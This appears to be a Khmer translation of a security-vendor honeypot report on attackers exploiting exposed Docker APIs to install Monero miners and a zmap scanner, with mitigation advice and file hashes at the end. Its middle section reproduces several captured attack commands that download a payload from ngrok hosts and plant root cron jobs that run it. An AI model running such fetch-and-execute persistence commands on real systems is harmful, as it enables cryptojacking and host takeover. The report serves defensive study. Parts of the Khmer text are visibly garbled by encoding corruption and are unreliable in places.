ααΎαααΆααα·ααΆααα·ααααααααααααααΌαααΆααααααααΎαα»αααΉααααα»α αααααΎαααΆααααααΎαααΎααααΈααΆαααΆαααΆαααααΆαααα ααα α αΎαααΎαααΆαααααΎααααααααΆαααααΆαααααΈα’ααααα»αααααΌαα·ααααααααααΈαααΌααααα·αα ααααΆα α¬ααααΆαααΆαα’αα»ααααΆα αααααααΌαααΆαααΆαααααααΆαααΆαα»αααααααααΆααα‘αΆα αααααααΎααΌαααΆααααααΆαααααα»αααααααα αααααα ααΎ Docker Hub α ααΌαααΆααααααααΌαααΆαααααΎααΆαααααααααααΆααααααααααααααΌαα’ααααα»αααααΌαα·αααααααΌαα·αααααααααααΆααααα·αα’αΆαααααα
ααΎαααΈαααααααααααα·ααΈαααααΆααααααΎααΆαααΆαα½ααααααΆαααααΌαααΆαααα‘αΎαααΎααααΈααααΆαα αΌααα αααα»ααα»αααΊαααααααα αα·αααΆααα·ααααααα·ααΈα
ααΎααα»ααααααααααααααΉααααα»αααααααΎαααΌα ααΎα αααααΊααΆαα½αααΉαααΆααααααααααΆαααΎα αααααααΆααα·ααΆαααΆααα»ααααα·ααΆαααΆαα½α α¬ααΆαααα‘αΎααααααα·ααΈααααααααΆαααααααααΆααα ααΌαα αααΆαααΆ Docker ααΆαααΆαααααΆααααααΆααααΆαααα‘αΎαααααΌα ααΎααααΈαααααΆαααα α»ααααα αα·αααΆαααΆααααααααααΆααααα ααα»αααα Honeypots αααααααΌαααΆαααααΎααααΆααααΊααΆαα»ααααααααΌαααΆααα ααΆα‘αΎαααΎααααΈαααααααααΆαααΆααααα αΆααααααΆαααααααααα ααΆααααααααααΆαααα»αααΊααα αα·ααααααΆαααααα·ααΈαα ααΆααααα»ααα»ααααααα
αααααααΆαααααΆααΆααααααΆαααααΎααααα½αα±ααααααααααΆααααααα αααααααΆαα·αααααΌαααΆαααΆαααΆαααααααα αα·αα―αααΆαααααΈαααα Docker αααααα ααΆααααααααααΆαααααααα ααΆαααααααααα·αααααΉαααααΌα α αΎαααΌα ααααααΎα ααΌαααΆααα»αααΊααα ααΊααΆα’αααΈαααα’αααααΆααααα αΆαααααΌααααααααααααΎαααΆαααΈαααααΆα αααΎααααααΎαα
Docker API ααααα·αααΆααα·αα’αα»ααααΆαα±ααα’αααααααΎααααΆααα’αα»αααααα½αααααααΌααΆααα½αα
αα
ααΆααααααααΊααΆαα·ααΈα
ααα
αΆααααααα αα
ααΆαααααΆαααΊααΆααα·ααααΆαααααα’αααααΆααααα αΆα αααα’αα»ααααΆαα²αααααα
ααααΌαααΆαααΈα
ααααΆαα
ααΆαα
ααα
αΆαααΆααααααααα 3762 ααΎα Docker APIs α ααα’ααααΎααΆαααααααα Shodan α
α»αααααααΈ 12.02.2019/XNUMX/XNUMX
αααααααααΆααααΆααααα αΆα αα·ααααααΎαααααα»α
αααααααΆαααααΆααΆαααααΌαααΆαααααΎααα·αααααΉααααααααΆααααα½αααΈαααααααΉααααα»αααα»αααααααα αα·ααααααααΈ Shodan αααα αΆαααΆα
ααα½α Docker APIs αααααααΌαααΆαααΆααααααΆα (ααΌαααΎαααααΆα ααααΈααΈα) ααΆαααΎαα‘αΎαα
αΆααααΆααααΈααΎαααΆααααΎαα’ααααααα»αααΊααααααααΆαααααααα
ααΆαααααααααα·αααααΉαααααΌααααααααΌαααΆαααααΎααΆααααΆαααΎααααΈααΆααα±ααααααΎααααΆαααααααα·ααΈαα»ααααααααΌαα·αααααα Monero α αα
αααα»ααΆααααΆααα»α (2018 αα·αααααααα
αα
α»αααααα
ααΆααα·αα·αααααΎαααααα ααα» Honeypot ααΆααααα αΆαααΆααΆαααααΎααααΆααααΌαααΆααα»αααΊαααααααααΌαααΆαααααΆαααααΆααααΆαα½αααΉαααΆαααααΎααααΆαααααααα
Tty: false
Command: β-c curl βretry 3 -m 60 -o /tmp9bedce/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d βhxxp://12f414f1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283β;echo β* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283dβ >/tmp9bedce/etc/crontab;echo β* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283dβ >/tmp9bedce/etc/cron.d/1m;chroot /tmp9bedce sh -c βcron || crondββ,
Entrypoint: β/bin/shβ
Tty: false,
Command: β-c curl βretry 3 -m 60 -o /tmp570547/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d βhxxp://5249d5f6[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283β;echo β* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283dβ >/tmp570547/etc/crontab;echo β* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283dβ >/tmp570547/etc/cron.d/1m;chroot /tmp570547 sh -c βcron || crondββ,
Entrypoint: β/bin/shβ
Tty: false,
Command: β-c curl βretry 3 -m 60 -o /tmp326c80/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed βhxxp://b27562c1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4eeβ;echo β* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eedβ >/tmp326c80/etc/crontab;echo β* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eedβ >/tmp326c80/etc/cron.d/1m;chroot /tmp326c80 sh -c βcron || crondββ,
Entrypoint: β/bin/shβ,
Tty: false,
Cmd: β-c curl βretry 3 -m 60 -o /tmp8b9b5b/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed βhxxp://f30c8cf9[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4eeβ;echo β* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eedβ >/tmp8b9b5b/etc/crontab;echo β* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eedβ >/tmp8b9b5b/etc/cron.d/1m;chroot /tmp8b9b5b sh -c βcron || crondββ,
Entrypoint: β/bin/shβ
ααΌα αααα’αααα’αΆα ααΎα α―αααΆααααααΆααααα»αα‘αΎαααααΌαααΆαααΆαααααΈ URLs αααααααΆααααααΌαααΆαα·α αα α URL ααΆαααααααΆαααΆαααα·α αααααα»ααααααααααΈ ααΌα ααααααααα»ααα·αα’αΆα ααΆαααααΆααααααααΆααααΈααΆαααα·α αααααα»ααααααα
ααΆααααααΎααααα»αααΈαα ααΈαα½αααΊααΆα’αααααΈαααα ELF αααααΆαα ααααααααααΆααααΈαα»α (αααααααΆααΆ Coinminer.SH.MALXMR.ATNO) αααααααΆαααα α’αΆαααΈααααα ααΈααΈαααΊααΆααααααΈα (TrojanSpy.SH.ZNETMAP.A) αααααααΌαααΆααα ααΆα‘αΎαααΎααααΈααα½αααΆαα§ααααααααααΆαααΆααααΆαααααααααΎααΎααααΈααααααα½ααααααΆα α αΎααααααΆαααααααααααααααα ααααΈα
ααααααΈα dropper αααααα’αααααΈαααααααααΆααααααααΌαααΆαααααΎααΎααααΈααΆαααααααΆα cryptocurrency miner α α’ααα HOST ααΆα URL αααα―αααΆαααααΆααΆαααΆαααΈααΆαααα α αΎαα’ααα RIP ααΊααΆαααααα―αααΆα (ααΆααα·α αααααΆ) ααααα’ααααα»αααααααααααααΌαααΆαααααααΆαα α’ααα HOST ααααΆααααααΌαααΆααααααααα’ααα hash ααααΆααααααΌαα ααααααΈαααααααΆααΆααα·αα·αααααΎαααΆααααΆαα’ααααα»αααααΌαα·ααααααααααΈαααΌαααααααααααα»αααααΎαααΆααα ααΎαααΆαααΈααααααααααΌαααΆαααΆααααα αΆααααααα
α§ααΆα αααααα’ααα HOST αα·α RIP ααααΌα
ααΆααααααΆαααααααααααΌααααααααΎααΎααααΈαα·αα·αααααΎαααΆααααΆαα’ααααα»αααααααααααααααααα»αααααΎαααΆααα
αα»ααααα αΆααααααΎαα’ααααα»αααααα ααΆααααΌαααΆαααααΌαααααααα ααΆ nginx α ααααααααααααααααααααΈααααααααΌααααααα’ααααα»αααααααα ααΆααααΆααααααααα αααΆαααααααααααααα’αΆα ααΆαααααααΆααα αααα»αααα·ααααΆαααΈαα»α α ααΆααααααΆ ααΆαααααααααΆααααΎααααΈααααααΆααααΆααααα½ααα·αα·ααααααααΆααααΉααααααΈααααααΎαααΆαααααααα»αααααΎαααΆαα
ααααααΈααααααααααααΆααααααααα·ααααααααα ααΆααααΎαααΆαααΆαα½αααααΆαααα URL ααΌα ααααΆααΎααααΈααΆαααααααΆαα§αααααα αΆαααΆα αα αααα»αα αααααα½αααααΆα zmap binary αααααααΌαααΆαααααΎααΎααααΈααααααααααΆα αα·αααα½αααΆααααααΈα αααααΎαα ααααααΈααααααα»ααααααααααααααΈααααααααααααααααΌαααΆαααααΎααΎααααΈααααΎα’ααααααααααΆαα½αααααΆαααααααααΆαααααΎα αα·αααα½ααααΆααΈαα½αααααΎααααΈαααααααααααΆαααααααα’αααΈααααΆαααααααααΆαααααΎα (α§ααΆα ααα ααααααααααΆ)α
ααααααΈααααααααααΆαα»αααΌααα½ααααααΆααα½αα ααα½ααααααααΌαααααα ααα»ααααααΆα’αΆαααααααΎααααααααααααΈαα ααΆαααααααα αααααααα ααΈααααΆααααααααα - αααα»αααααΈααα Docker - αα»ααααααααΎαααΆααααααα
αααΆαααΆααααα
αααα’αΆα
ααααΎααΆαααααΌαααΆαααααΎα αααΆααααΌαααΆαααα
αααααααααααααααααα·ααΈαα½αααα ααααααΈαααααααααααα
α’αΆαααααααΎααααΆαααα αααααα·ααΈ αααΆαααΆαα» α¬αααα·ααΆαααα
αΆααα’αΆααααααα Redis, Jenkins, Drupal, MODX,
ααα·α αααααΆααααα αΆαααΊααΆααΌαααΆα Docker ααΌα αααα’αΆα ααΎαααΎααα αααα»ααααααααΈααααααΆααααααΌαα
αα
αααααααΆαααΎαααα»αααααΌαααααααα
ααΆααααΆααααααααα
αααΆαα α αΎααα
ααΆααααααααΊααΆααααααα zmap ααααΌαααΆαααααΎααΎααααΈααααααααααΆα
αα
αααααααΆαααΎααΊααΆαα½ααααααΆααααααΆααααααααΆαα»α αα
ααΆααααααααΊααΆα
αααααΆααααΆαααααααΆαααααααααααααΆαααα αα½αααΆαα Docker αααααα
ααΌαααα’αααααααααα αΆαααΆααΌαααΆα alpine-curl ααααΌαααΆαααΆαααα
αααΎαααΆα 10 ααΆααα
αααααα’ααααΎ Alpine Linux αα·α curl αααααΆα§ααααα CLI αααααΆαααααα·αααααΆαααααΆααααααΆαααααααα―αααΆαααΎαα·ααΈααΆααααααα α’αααα’αΆα
αααααΎα
ααΆααΆααΆαααααΆαααααα»αααΆαααααααααΆααααΆααΌαααΆαααα (alpine-curl) αααα½αααΆαα·ααααααΆααααΆααΆαααααα»ααααααΌα αααα’αααααΆαααΎαααΆαααΎααΆα’αΆα ααααΌαααΆαααααΎααΎααααΈα’αα»αααααα»αααΆαααααΆααΆαα ααΌαααΆα Docker ααααααααααΆααα’αΆα ααααΌαααΆαααααΎααΎααααΈααααΎαααααααΆαααααΆααΆααααααα ααΎαααΆαααΆαααα Docker αα·αααααΎααΆαααΆαα½ααα½αααααΎαααα αΆαααα
α’αα»ααΆααα
α§ααααααα·α ααα»αααααΆααα·ααΆααααΆαα αααα»αα’αααααααααααα αΆαααΈαααααΌαααΆααααα»αααΆααα·αααΌαααΈαα»ααααα·ααΆαααΆααααΈααααΌα αα½αααΆααα’αα»ααΆαααααΌα ααΆααααααα
- αααααΆααα’αααααααααααααααααααα αα·αα’αααα’αα·ααααααα αα·αα·αααααΎαααΆαααααα API ααααα’αααααΆαα·α αα ααΎααααΈααααΆααααΆα’αααΈαααααααααΆαααααΌαααΆαααααααα ααΆααααααααααΎααααΈααα½αααααααααΎααΈαααΆαααΈαααααΆααααΆαα α¬αααααΆαααΆααααα»αααα»αααααα
- α’αα»ααααααΆααααααΆααααααα·αααα·αα·α αααα»αα ααΆααΆααΆααΌαααΆααα»αααΊαααααααΌαααΆαα α»αα αααααααΆ αα·ααααααααααΆαα αααααααΆαα αΌαααααΎαααΆαααΆαα»ααααΆααα (ααααΆααααααΎαααααΎαααΆααα»αααΊααα) αα·αααααααααΆαα’αα·αααααΈααα ααΉαααΆααααααΆαααααααΆαα
- ααααΎααΆα
α’αα»ααΆααα αα·αααΎαααααααΆααα»ααααα·ααΆα α§.ααΈ Docker αα·αααΆααααα‘αΎααα αααα»ααααααααα»ααααα·ααΆα . - ααααΎααΆααααααααααααααΎαααΆα αα·αααΌαααΆααααααααααααααααα· ααΎααααΈααα½αααΆαααααααΆαααααααα’αααΈααααΎαααΆαααααααα»αααααΎαααΆααα αααα»ααα»αααΊααα (α§ααΆα ααα ααΎααααΈαααααααααΆααααααααααα α¬αααααααααΆαααΆαααααααα)α ααΆαααααααααααααααα·ααΈ αα·αααΆααααα½ααα·αα·αααααΆαααααΉαααααΌααα½αααΆαααΆαααΆαααααΆααααααΌααα·αααααααααΈα αααααααΆαααΈααα α―αααΆα αα·ααααααααααααααα
Trendmicro αα½ααααα»α DevOps αααααΎαααααα»ααααα·ααΆα ααααΎαααΆααααΆαααΆαααα αα αα·αα
αΆααααααΎααααααααΈααααααα αα·ααααΆααΆαααΈααααΌ
αααααΆααααΆααααααααααα½α
αααααΆαααααΆααααα
- 54343fd1555e1f72c2c1d30369013fb40372a88875930c71b8c3a23bbe5bb15e (Coinminer.SH.MALXMR.ATNO)
- f1e53879e992771db6045b94b3f73d11396fbe7b3394103718435982a7161228 (TrojanSpy.SH.ZNETMAP.A)
αα
ααΎ
ααααα: www.habr.com